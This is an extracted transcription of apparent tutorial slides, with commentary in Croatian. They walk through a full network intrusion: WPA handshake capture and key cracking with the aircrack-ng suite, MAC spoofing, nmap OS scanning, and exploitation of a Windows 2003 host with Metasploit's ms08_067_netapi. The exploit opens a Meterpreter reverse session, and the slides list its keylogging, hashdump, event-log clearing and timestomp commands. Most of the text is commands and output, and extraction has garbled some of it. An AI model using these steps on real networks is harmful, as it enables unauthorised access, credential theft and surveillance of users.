IEEE bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm

Transcription

1 airmon-ng Interface Chipset Driver wlan0 wlan1 Ralink 2570 USB rt2500usb - [phy1] Intel 3945ABG iwl [phy0] root@bt:~# airmon-ng start wlan0 Interface Chipset Driver wlan0 Ralink 2570 USB rt2500usb - [phy1] (monitor mode enabled on mon0) wlan1 Intel 3945ABG iwl [phy0] root@bt:~# ifconfig mon0 down root@bt:~# macchanger -r mon0 Current MAC: 4b:6d:a2:bb:3d:42 (Original) Faked MAC: 1a:1c:ea:c1:a5:41 (unknown) root@bt:~# ifconfig mon0 up root@bt:~# iwconfig mon0 mon0 IEEE bg Mode:Monitor Frequency:2.437 GHz Tx-Power=20 dbm Retry min limit:7 RTS thr:off Fragment thr:off Encryption key:off

2 Power Management:off Link Quality:0 Signal level:0 Noise level:0 Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0 Tx excessive retries:0 Invalid misc:0 Missed beacon:0 airodump-ng mon0 airodump-ng -c 6 --bssid 31:08:34:1b:5a:21 -w wpapsk mon0 CH 6 ][ Elapsed: 8 s ][ :50 ][ WPA handshake: 03:CD:B5:34:3D:12 Aircrack-ng 1.0 r1645 [00:00:10] keys tested ( k/s) KEY FOUND! [ proracunska ] Master Key : BE B9 53 D F DA 1E BC F3 2A 33 2D B0 9B BA D6 F8 8E D6 4F C4 68 Transient Key : A 79 A8 AE E3 11 E2 DA 65 E1 63 7A 0C 14 BC D D 3B BE 1B 2C 9F AA 6B 3E 3A 73 7F E6 3C B0 E6 6F C CF A9 E0 B5 35 0A FB 5D 0C D D DF 25 E9 E0 8D 09 CD 0A ED EAPOL HMAC : D 1C 12 C B 71 CE 2B 13 C9 F9

3 Sada ću se spojiti na mrežu tako sto ću koristiti istu mac adresu koju sam bio promijenio. airmon-ng stop mon0 macchanger wlan0 -m : 1a:1c:ea:c1:a5:41 Pokrenuti ću wicd network manager i spojiti se. Pokrenuti ću nmap da vidim koji su sve sistemi na mojoj mreži. root@bt:~# nmap -O /24 -O: detekcija operativnog sitema Nmap scan report for server.dummy.porta.siemens.net ( ) Host is up (0.0018s latency). Not shown: 988 closed ports PORT STATE SERVICE 23/tcp open telnet 53/tcp open domain 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 1025/tcp open NFS-or-IIS 1026/tcp open LSA-or-nterm 1029/tcp open ms-lsa 1031/tcp open iad2 1032/tcp open iad3

4 3389/tcp open ms-term-serv MAC Address: A6:DB:CB:21:85:C3 (Microsoft) Device type: general purpose Running: Microsoft Windows 2000 XP 2003 OS details: Microsoft Windows 2000 SP2 - SP4, Windows XP SP2 - SP3, or Windows Server 2003 SP0 - SP2 Network Distance: 1 hop OS detection performed. Please report any incorrect results at Nmap done: 256 IP addresses (9 hosts up) scanned in seconds Zbog toga što sada znamo koju verziju imamo u mreži te je izašao kod koji napada TCP port 139 i 445 te su windows xp SP3 i windows server 2003 ranjivi za daljinski napad. Zakrpa je izašla Pokrenuti ću metasploit root@bt:~# msfconsole =[ metasploit v3.5.1-dev [core:3.5 api:1.0] =[ 628 exploits auxiliary =[ 215 payloads - 27 encoders - 8 nops =[ svn r10964 updated 7 days ago ( ) msf > show exploits msf > use windows/smb/ms08_067_netapi

5 msf exploit(ms08_067_netapi) > set RHOST RHOST => msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler on :4444 [*] Automatically detecting the target... [*] Fingerprint: Windows 2003 No Service Pack - lang:unknown [*] Selected Target: Windows 2003 SP0 Universal [*] Attempting to trigger the vulnerability... [*] Sending stage ( bytes) to [*] Meterpreter session 1 opened ( :4444 -> :445) at :59: meterpreter > help Core s =============? Help menu background Backgrounds the current session bgkill bglist Kills a background meterpreter script Lists running background scripts

6 bgrun channel close exit help interact irb migrate quit read run use write Executes a meterpreter script as a background thread Displays information about active channels Closes a channel Terminate the meterpreter session Help menu Interacts with a channel Drop into irb scripting mode Migrate the server to another process Terminate the meterpreter session Reads data from a channel Executes a meterpreter script Load a one or more meterpreter extensions Writes data to a channel Stdapi: File system s ============================ cat cd del Read the contents of a file to the screen Change directory Delete the specified file download Download a file or directory edit getlwd getwd Edit a file Print local working directory Print working directory

7 lcd lpwd ls mkdir pwd rm rmdir search upload Change local working directory Print local working directory List files Make directory Print working directory Delete the specified file Remove directory Search for files Upload a file or directory Stdapi: Networking s =========================== ipconfig portfwd route Display interfaces Forward a local port to a remote service View and modify the routing table Stdapi: System s ======================= clearev Clear the event log

8 drop_token Relinquishes any active impersonation token. execute getpid getprivs getuid kill ps reboot reg rev2self shell Execute a command Get the current process identifier Get as many privileges as possible Get the user that the server is running as Terminate a process List running processes Reboots the remote computer Modify and interact with the remote registry Calls RevertToSelf() on the remote machine Drop into a system command shell shutdown Shuts down the remote computer steal_token Attempts to steal an impersonation token from the target process sysinfo Gets information about the remote system, such as OS Stdapi: User interface s =============================== enumdesktops List all accessible desktops and window stations getdesktop idletime Get the current meterpreter desktop Returns the number of seconds the remote user has been idle keyscan_dump Dump the keystroke buffer keyscan_start Start capturing keystrokes keyscan_stop Stop capturing keystrokes

9 screenshot setdesktop Grab a screenshot of the interactive desktop Change the meterpreters current desktop uictl Control some of the user interface components Priv: Elevate s ====================== getsystem Attempt to elevate your privilege to that of local system. Priv: Password database s ================================ hashdump Dumps the contents of the SAM database Priv: Timestomp s ======================== timestomp Manipulate file MACE attributes

10 meterpreter > idletime User has been idle for: 6 mins 10 secs Kao što vidimo možemo dalje manipulirati sistemom.